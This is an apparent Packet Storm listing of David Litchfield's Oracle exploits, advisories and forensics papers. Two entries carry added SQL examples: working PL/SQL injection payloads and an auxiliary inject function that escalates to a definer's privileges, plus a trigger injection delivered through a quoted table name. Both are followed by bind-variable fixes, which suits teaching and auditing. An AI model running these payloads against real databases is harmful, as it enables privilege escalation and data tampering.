Showing 1 - 25 of 128

Files from David Litchfield

Email address: david at davidlitchfield.com
First Active: 1999-08-17
Last Active: 2017-09-14
Oracle XDB FTP Server Buffer Overflow
Posted Sep 14, 2017
Authored by David Litchfield, D7X

This is the original NGSSoftware (David Litchfield) exploit presented at Black Hat 2003, with modified offsets.

tags | exploit, overflow
SHA-256 | 2934de4bc1a2a39fa753b07c7aed7721ca1d6b5bdca6f0a13ab3af13bb340f69
Oracle XDB FTP Service UNLOCK Buffer Overflow
Posted Aug 12, 2017
Authored by David Litchfield

Oracle XDB FTP service UNLOCK buffer overflow exploit.

tags | exploit, overflow
advisories | CVE-2003-0727
SHA-256 | 9e19613c0772392eaf9f901e50037bd1162a139d600f1e7c69b1a0f577c16ba4
Oracle Patches 27 Vulnerabilities
Posted Jul 20, 2016
Authored by David Litchfield

Oracle has patched a total of 27 vulnerabilities affecting E-Business Suite R12.x and 11.5, APEX, Primavera, OBIEE, and Agile DB components. The issues include SQL injection, cross-site scripting, XXE injection, SSRF, broken access controls, and more.

tags | exploit, vulnerability, xss, sql injection, xxe
advisories | CVE-2016-3448, CVE-2016-3467
SHA-256 | 1653be97a06d0c2cfb3b03919f6fc2b0e26ba7129144b78467d3acbf64b1587a
DBMS_XMLSTORE As An Auxiliary SQL Injection Function In Oracle 12c
Posted Jul 22, 2014
Authored by David Litchfield

The ability to execute arbitrary SQL on Oracle via a SQL injection flaw is hampered by the fact that the Oracle RDBMS will not batch multiple queries. Typically, a low-privileged attacker holding, say, only the CREATE SESSION privilege must find a function they can inject that allows them to execute a block of anonymous PL/SQL. These are known as auxiliary inject functions. Depending on the version of Oracle and which components are installed, auxiliary inject functions may be few and far between; on Oracle 12c with the internal Java VM removed, for example, there may be none. During a recent client assessment the author of this paper was confronted with exactly that situation: a PL/SQL injection flaw, but no easy route to exploiting it for full control of the database server. This paper presents a way around the problem using DBMS_XMLSTORE and, coincidentally, DBMS_XMLSAVE. The method can be used in web-based SQL injection attacks as well.

tags | paper, java, web, arbitrary, sql injection
SHA-256 | 42373a43d60cc25c4d8fb1e06e905e8adafeae668b2a402d7121f1232ab9d611
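The mechanism the abstract describes, as a constructed illustration added to this listing (it is not code from the paper): a definer-rights procedure that concatenates its argument into dynamic SQL, why a stacked second statement fails, how an injected subquery reaches a function that executes an arbitrary PL/SQL block with the definer's privileges, and the bind-variable rewrite that closes the hole. All names (APP_OWNER, EMP, LOOKUP_EMP, SCOTT, AUX_EXEC) are hypothetical. The attacker here creates AUX_EXEC itself, which needs CREATE PROCEDURE; the paper's point is that an attacker holding only CREATE SESSION must instead find an equivalent that is already installed, which is the role DBMS_XMLSTORE plays there.

```sql
-- Constructed example for this listing, not from the paper. Object names are hypothetical.

-- (1) Vulnerable: a definer-rights procedure owned by APP_OWNER, callable by
--     anyone, that splices its argument into a dynamic statement.
CREATE OR REPLACE PROCEDURE app_owner.lookup_emp (p_name IN VARCHAR2) AS
  l_sql   VARCHAR2(4000);
  l_count NUMBER;
BEGIN
  l_sql := 'SELECT COUNT(*) FROM app_owner.emp WHERE ename = ''' || p_name || '''';
  EXECUTE IMMEDIATE l_sql INTO l_count;      -- runs with APP_OWNER's privileges
  DBMS_OUTPUT.PUT_LINE('matches: ' || l_count);
END;
/
GRANT EXECUTE ON app_owner.lookup_emp TO PUBLIC;

-- (2) Why stacked queries fail: EXECUTE IMMEDIATE takes exactly one statement,
--     so a ';' in the injected text is a syntax error, not a second statement.
--     EXEC app_owner.lookup_emp('x''; GRANT SELECT ON app_owner.emp TO scott--')
--     fails with a parse error (typically ORA-00911: invalid character).

-- (3) The auxiliary inject function. SCOTT (given CREATE PROCEDURE for this
--     demo) creates a function that executes whatever PL/SQL it is handed.
--     AUTHID CURRENT_USER is what matters: called from SQL issued inside
--     APP_OWNER's definer-rights procedure, the current user is APP_OWNER, so
--     the block runs with APP_OWNER's privileges. The autonomous transaction
--     lets DDL run from inside a SELECT.
CREATE OR REPLACE FUNCTION scott.aux_exec (p_block IN VARCHAR2) RETURN NUMBER
  AUTHID CURRENT_USER AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE p_block;
  COMMIT;
  RETURN 0;
END;
/
GRANT EXECUTE ON scott.aux_exec TO PUBLIC;

-- (4) The injection is a UNION, not a second statement. Both branches are
--     evaluated, so the function fires even when EMP has no matching row, and
--     because it returns 0 the UNION collapses into the single row the INTO expects.
BEGIN
  app_owner.lookup_emp(
    'x'' UNION SELECT scott.aux_exec(''GRANT SELECT ON app_owner.emp TO scott'') FROM dual--');
END;
/
-- The statement APP_OWNER actually runs:
--   SELECT COUNT(*) FROM app_owner.emp WHERE ename = 'x'
--   UNION SELECT scott.aux_exec('GRANT SELECT ON app_owner.emp TO scott') FROM dual--'
-- The GRANT executes as APP_OWNER, who owns EMP, so it succeeds: SCOTT can now read EMP.

-- (5) Fixed: bind the value instead of splicing it. The argument can no longer
--     change the shape of the statement, whatever characters it contains.
CREATE OR REPLACE PROCEDURE app_owner.lookup_emp (p_name IN VARCHAR2) AS
  l_count NUMBER;
BEGIN
  EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM app_owner.emp WHERE ename = :name'
    INTO l_count USING p_name;
  DBMS_OUTPUT.PUT_LINE('matches: ' || l_count);
END;
/
```

Two things to check when auditing a schema for this pattern: every definer-rights unit that concatenates caller-supplied text into EXECUTE IMMEDIATE, DBMS_SQL or OPEN ... FOR, and every PUBLIC-executable function with AUTHID CURRENT_USER and PRAGMA AUTONOMOUS_TRANSACTION that will run a string it is given, since those are the auxiliary inject functions an attacker without CREATE PROCEDURE goes looking for.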
Oracle Data Redaction Is Broken
Posted Jul 16, 2014
Authored by David Litchfield

Oracle data redaction is a simple but clever and innovative idea from Oracle. However, at present, there are weaknesses that undermine its effectiveness as a good security mechanism. These weaknesses can be exploited via web based SQL injection attacks and this paper details those weaknesses and provides suggestions on how it can be improved and made more secure.

tags | paper, web, sql injection
SHA-256 | 8cb488d94f0f24c541295b45894955646b915f06b2bd3f2038f2c4e7aac4422f
Oracle Job Scheduler Named Pipe Command Execution
Posted Dec 23, 2011
Authored by David Litchfield, sinn3r, juan vazquez | Site metasploit.com

This Metasploit module exploits the Oracle Job Scheduler to execute arbitrary commands. The Job Scheduler is implemented by the component extjob.exe, which listens on a named pipe called "orcljsex<SID>" and executes arbitrary commands received through this channel via CreateProcess(). SMB access is required to connect to the named pipe remotely. This Metasploit module has been tested on Oracle 10g Release 1 on Windows, where the Oracle Job Scheduler runs as SYSTEM but is disabled by default.

tags | exploit, arbitrary
systems | windows
SHA-256 | a5520991853dfba840715d948313a5ca0eee49a3177ec837c2761cf043b2c418
Exploiting PL/SQL Injection With Only Create Session Privileges In Oracle 11g
Posted Feb 12, 2010
Authored by David Litchfield

Whitepaper called Exploiting PL/SQL Injection With Only CREATE SESSION Privileges In Oracle 11g.

tags | paper, sql injection
SHA-256 | 31157f3cb6f553cf34b6e768826f981a7cca2b5b1cc22b2d008070e67dfeea5a
Hacking Aurora In Oracle 11g
Posted Feb 12, 2010
Authored by David Litchfield

Whitepaper called Hacking Aurora In Oracle 11g.

tags | paper
SHA-256 | 0feb80641a5561dcb72d5ac33a246623657479f00c1457155b7e072996ee1aa7
Oracle 9i XDB FTP UNLOCK Overflow (win32)
Posted Nov 26, 2009
Authored by David Litchfield, MC | Site metasploit.com

By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs.

tags | exploit, overflow
advisories | CVE-2003-0727
SHA-256 | 9d803a65a0fa667c55d0a6301fe1f03824fd821936248035c9472f401cc84910
Oracle 11g Password History
Posted Aug 26, 2009
Authored by David Litchfield | Site ngssoftware.com

Oracle 11g has an issue where password history is broken if it is set to use 11g passwords exclusively.

tags | advisory
advisories | CVE-2009-0988
SHA-256 | 0510af9aad44c7b6b78b30c03316a2131fe500ceabd5a53f4596b48268c0147d
Bypassing Oracle DBMS_ASSERT
Posted Aug 25, 2009
Authored by David Litchfield | Site ngssoftware.com

Whitepaper called Bypassing Oracle DBMS_ASSERT (in certain situations). Originally written in July of 2008 but is just being released now.

tags | paper
SHA-256 | e6e1d68c71f6151caeb0c9cf0b475ad6bbf96d0a3d4464eca34740718a6b39f8
Oracle PL/SQL Injection
Posted Aug 25, 2009
Authored by David Litchfield | Site ngssoftware.com

Oracle suffers from a PL/SQL injection vulnerability in REPCAT_RPC.VALIDATE_REMOTE_RC.

tags | advisory, sql injection
advisories | CVE-2009-1021
SHA-256 | 5d4b4629c0dfdd25f1e4105dfc3bdb283c7a29ba838e5cb3f49d18e230721815
NGSSoftware Insight Security Research Advisory NISR13012009
Posted Jan 14, 2009
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - Oracle has just released a fix for a flaw that, when exploited, allows a low-privileged authenticated database user to gain MDSYS privileges. This can be abused by an attacker to perform actions as the MDSYS user. MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that form part of Oracle Spatial. It is vulnerable to SQL injection: when a user drops a table the trigger fires, and the name of the table is embedded in a dynamic SQL query which the trigger then executes. Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case; only the CREATE SESSION privilege is required.

tags | advisory, sql injection
advisories | CVE-2008-3979
SHA-256 | 5121c42e5d2e8b18156a9dd21c0939cd3a695ecc1539eda09d741e19ef556402
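A constructed illustration of the trigger pattern the advisory describes, added here and not the MDSYS code: a DDL trigger owned by a privileged schema splices the dropped object's name into dynamic SQL, followed by a version that handles the name safely. Names (APP_OWNER, TABLE_REGISTRY, TRG_DROP_CLEANUP, the X_AUDIT companion table) are hypothetical, and creating a DATABASE-level trigger requires the ADMINISTER DATABASE TRIGGER privilege. What differs from an ordinary procedure injection is the input channel: the attacker never calls the trigger, they drop a table whose quoted name carries the payload, and the trigger body runs with its owner's rights.

```sql
-- Constructed example; not Oracle's MDSYS trigger. Names are hypothetical.

-- (1) Vulnerable: the object name from the DDL event is spliced into a literal.
CREATE OR REPLACE TRIGGER app_owner.trg_drop_cleanup
  BEFORE DROP ON DATABASE
DECLARE
  l_sql VARCHAR2(4000);
BEGIN
  IF ora_dict_obj_type = 'TABLE' THEN
    l_sql := 'DELETE FROM app_owner.table_registry WHERE table_name = '''
             || ora_dict_obj_name || '''';
    EXECUTE IMMEDIATE l_sql;              -- runs as APP_OWNER, the trigger owner
  END IF;
END;
/

-- (2) The input is the table name, and a quoted identifier may contain a single
--     quote. Anyone who can create and drop a table in their own schema supplies
--     the payload without ever referencing the trigger (12 characters, so it fits
--     even the 30-byte identifier limit of releases before 12.2):
CREATE TABLE "X' OR 1=1--" (c NUMBER);
DROP TABLE  "X' OR 1=1--";
-- APP_OWNER's trigger then executes, with APP_OWNER's privileges:
--   DELETE FROM app_owner.table_registry WHERE table_name = 'X' OR 1=1--'
-- which empties the registry. Swapping 1=1 for a call to an auxiliary inject
-- function turns the same break-out into arbitrary PL/SQL as the trigger owner.

-- (3) Fixed. Where the name is used as a literal, bind it. Where it must be used
--     as an identifier (here, purging a companion audit table named after the
--     dropped one, assumed to exist), a bind is impossible; DBMS_ASSERT.ENQUOTE_NAME
--     double-quotes it so it always parses as exactly one identifier.
--     DBMS_ASSERT validates identifiers, not literals: SIMPLE_SQL_NAME accepts the
--     quoted name in (2) as a valid identifier, so it would not have protected the
--     literal in (1). Only the bind does.
CREATE OR REPLACE TRIGGER app_owner.trg_drop_cleanup
  BEFORE DROP ON DATABASE
DECLARE
  l_name VARCHAR2(128) := ora_dict_obj_name;
BEGIN
  IF ora_dict_obj_type = 'TABLE' THEN
    EXECUTE IMMEDIATE 'DELETE FROM app_owner.table_registry WHERE table_name = :n'
      USING l_name;
    EXECUTE IMMEDIATE 'DELETE FROM app_owner.'
      || DBMS_ASSERT.ENQUOTE_NAME(l_name || '_AUDIT', FALSE);
  END IF;
END;
/
```

The practical rule that falls out of this: validate with DBMS_ASSERT only where the value is going to be parsed as an identifier, and bind everywhere it is going to be parsed as a string literal, because a value that passes an identifier check can still contain a single quote.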
cadfile.zip
Posted Nov 26, 2008
Authored by David Litchfield | Site databasesecurity.com

Orablock allows a forensic investigator to dump data from a "cold" Oracle data file. There is no need to load the data file into the database, which would cause the data file to be modified, so using Orablock preserves the evidence. Orablock can also be used to locate "stale" data, that is, data that has been deleted or updated.

tags | tool, forensics
SHA-256 | c27a3adbdc20b162d44045a32dee98aa4c8cc3e34d7b97443c808d75c9a898ef
oracle-forensics-scns.pdf
Posted Nov 26, 2008
Authored by David Litchfield | Site databasesecurity.com

Oracle Forensics Part 7: Using the Oracle System Change Number in Forensic Examinations.

tags | paper
SHA-256 | 051ce7024ae89d5e1b9b1e94a3bf3171e5efbdd0947cbd1832b4846b9d8611cf
lateral-sql-followup.txt
Posted Jul 18, 2008
Authored by David Litchfield | Site ngssoftware.com

Follow up information regarding a whitepaper about lateral SQL injection and how ALTER SESSION privileges are not needed.

tags | advisory, sql injection
SHA-256 | 06ae8157765032c011e169cd19e3c3a5aabdb8d056cd7f0dc04fe33ce633c4c1
NISR15072008.txt
Posted Jul 16, 2008
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - Oracle Application Server installs a number of PL/SQL packages in the backend database server. One of these is the WWV_RENDER_REPORT package, and it is vulnerable to PL/SQL injection. This package uses definer-rights execution and therefore executes with the privileges of its owner, in this case the highly privileged PORTAL user.

tags | advisory, sql injection
advisories | CVE-2008-2589
SHA-256 | 9b8fadd595dfccce56403731ee006274cd61e8b1f62476460b18211d7135e98e
lateral-sql-injection.pdf
Posted Apr 24, 2008
Authored by David Litchfield | Site ngssoftware.com

Lateral SQL Injection: A New Class of Vulnerability in Oracle.

tags | paper, sql injection
SHA-256 | 0db673b33010a9aa5626bc5198e1ef07be87e36a1d9a04d25e9c098c2c211bbe
oracle-default.txt
Posted Nov 14, 2007
Authored by David Litchfield | Site ngssoftware.com

Oracle 11g and 10g have a default password vulnerability during the install process.

tags | advisory
SHA-256 | 9f5760b9411b159e7a5575efdffb65924eed9b9c2af42fc47a84c44578aa8694
NISR17102007E.txt
Posted Oct 18, 2007
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - The Oracle XML DB ftp service contains problems with auditing logins.

tags | advisory
SHA-256 | 2639ac2b24b2c8d5133eff124f15167a71fbd4375eea39277529464a214d3dce
NISR17102007D.txt
Posted Oct 18, 2007
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - The Oracle RDBMS, on receiving an invalid TNS data packet, will consume 100% of the CPU's time, introducing a denial of service condition.

tags | advisory, denial of service
SHA-256 | e7b0e95883d2072b1a56b5fdfcf4738223ad9c7c04551753f7ce3368ba5e986c
NISR17102007C.txt
Posted Oct 18, 2007
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - The Oracle TNS Listener suffers from denial of service and/or remote memory inspection vulnerabilities. Systems affected include Oracle 8.1.7.4, Oracle 9, and 10g Release 1 and 2.

tags | advisory, remote, denial of service, vulnerability
SHA-256 | 2df77d5f0342cb6ee96c1251a4daebb88b481263665cf072ef864d3780bd5b37
NISR17102007B.txt
Posted Oct 18, 2007
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - The Workspace Manager in Oracle 10g Release 1 and 2 and Oracle 9i is vulnerable to SQL injection. The Workspace Manager, owned by SYS, contains a package called LT. This package is owned and defined by the SYS user and can be executed by PUBLIC. LT contains a procedure called FINDRICSET, which calls the FINDRICSET procedure in the LTRIC package. This is vulnerable to SQL injection and can be abused by an attacker to gain SYS privileges.

tags | advisory, sql injection
SHA-256 | 5df31c6c9790c218a2a5535198524baba532d40fd776334551174739a7f50ba0
NISR17102007A.txt
Posted Oct 18, 2007
Authored by David Litchfield | Site ngssoftware.com

NGSSoftware Insight Security Research Advisory - The Intermedia application, owned by CTXSYS, contains a package called CTX_DOC. This package contains multiple SQL injection flaws.

tags | advisory, sql injection
SHA-256 | b9ba2ce84bdcab48f900e299204898570d236d962e46142d20245fc29727b497
oracle-forensics-6.pdf
Posted Aug 17, 2007
Authored by David Litchfield | Site databasesecurity.com

Whitepaper: Oracle Forensics Part 6 - Examining Undo Segments, Flashback and the Oracle Recycle Bin.

tags | paper
SHA-256 | 76e1d7ed99164fa689c01f4960b40e5de09c7ff60fa91c3fe4fcaabf1c4422f2
© 2022 Packet Storm. All rights reserved.